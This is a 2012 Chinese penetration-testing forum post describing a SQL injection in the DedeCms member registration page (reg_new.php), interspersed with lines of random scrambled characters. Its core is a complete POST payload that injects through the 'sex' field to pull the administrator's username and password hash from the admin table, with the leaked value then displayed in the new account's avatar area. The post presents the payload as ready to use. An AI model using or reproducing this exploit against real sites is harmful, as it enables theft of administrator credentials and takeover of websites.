中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
+ W K# f6 {, y8 r7 l- V3 @/ j
% s% }: Q0 k3 E% u( n
需要magic_quotes_gpc=Off
1 C) @, A1 t5 _+ Q1 Z
6 c& q# r4 v$ g1 l( n$ e8 }; m
应该是没有什么大危害的漏洞.
7 c# o( z9 ?# v8 l( l
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
3 X' l/ O. k/ w6 z
; ]) z% r1 X, F- D
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
2 c9 }8 ~3 Q7 Q1 d( k- U
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
* p# x* M V$ W) ~( y; W# Z. n1 _
) N0 Q; }6 _: `. v" B
http:///de/member/reg_new.php
6 p. K: T+ A, g, h) J
, T) d8 F E6 k+ u' ]3 L( I
POST
8 D5 K- P# z/ E8 p! G
6 u8 [! R6 @4 E& |: r0 I
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
6 `" [, T9 R$ g2 i
* Y1 U* T l5 ^, r8 M; z# M! _" k
成功注册后,头像处里面有好玩的信息.
# @# j% r7 [- L) ~5 q# t! G
" t, M- ?$ p0 |6 `& s
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2